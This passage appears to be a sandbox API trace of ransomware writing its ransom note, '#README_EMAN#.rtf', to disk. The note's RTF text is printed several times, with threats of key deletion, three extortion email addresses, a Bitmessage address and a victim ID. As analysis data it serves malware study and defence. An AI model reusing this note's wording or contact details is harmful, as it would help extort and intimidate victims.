:\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.341] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.341] CloseHandle (hObject=0x294) returned 1 [0273.341] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0273.341] GetLastError () returned 0x2 [0273.341] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.342] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.342] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.342] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 